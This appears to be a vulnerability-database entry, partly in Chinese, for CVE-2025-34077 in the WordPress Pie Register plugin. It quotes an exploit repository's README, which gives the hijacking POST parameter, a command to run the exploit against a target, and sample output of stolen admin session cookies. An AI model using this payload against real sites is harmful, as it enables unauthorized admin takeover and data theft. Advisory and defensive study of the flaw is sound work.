WordPress Pie Register Admin Privilege Escalation Vulnerability
漏洞信息
漏洞名称: WordPress Pie Register Admin Privilege Escalation Vulnerability
漏洞编号:
- CVE: CVE-2025-34077
漏洞类型: 权限提升
漏洞等级: 高危
漏洞描述: WordPress的Pie Register插件(版本≤3.7.1.4)存在一个未授权端点,攻击者可以通过发送特定的POST请求来劫持管理员会话。此漏洞允许攻击者无需任何登录凭证即可窃取用户ID为1(通常是管理员)的会话cookie。受影响的软件包括Pie Register插件,版本小于等于3.7.1.4。漏洞的技术根源在于插件暴露了一个未经验证的端点,该端点允许攻击者通过提交特定的参数(user_id_social_site=1)来获取管理员的有效会话cookie。这种漏洞的存在可能导致严重的安全风险,包括但不限于远程代码执行、数据泄露和服务中断。由于攻击者无需认证即可利用此漏洞,因此其危害性较高,且可以自动化利用。
产品厂商: WordPress
产品名称: Pie Register
影响版本: <= 3.7.1.4
来源: https://github.com/MrjHaxcore/CVE-2025-34077
类型: CVE-2025:github search
仓库文件
- README.md
- pie.py
来源概述
CVE-2025-34077 — WordPress Pie Register ≤ 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)
💀 Author
Mrj Haxcore
🧠 Vulnerability Summary
The Pie Register plugin for WordPress (version ≤ 3.7.1.4) exposes an unauthenticated endpoint that allows an attacker to hijack admin sessions simply by POSTing a specific payload.
Exploitation results in stealing the session cookies of user ID 1 (usually admin) without needing any login credentials.
📦 Affected Software
- Plugin Name: Pie Register
- Version: <= 3.7.1.4
- Plugin Slug:
pie-register - Plugin Page
- Vulnerable Download Link
📬 Vulnerable Parameter:
user_id_social_site=1
When posted to the root URL (/), this parameter causes the plugin to authenticate the attacker as the user with ID 1 (typically the admin), and issue valid session cookies.
🔧 Requirements
- Python 3.x
requests,beautifulsoup4(optional, for cookie parsing)
▶️ Run the Exploit
python3 pie.py http://target.site
---
Output
[*] Sending payload to hijack admin session...
[+] Successfully hijacked cookies for user_id=1 (admin):
wordpress_sec_xxxxxx = <cookie_value>
wordpress_logged_in_xxxxxx = <cookie_value>
[!] Use these cookies in your browser or tools like curl or Burp to act as admin.
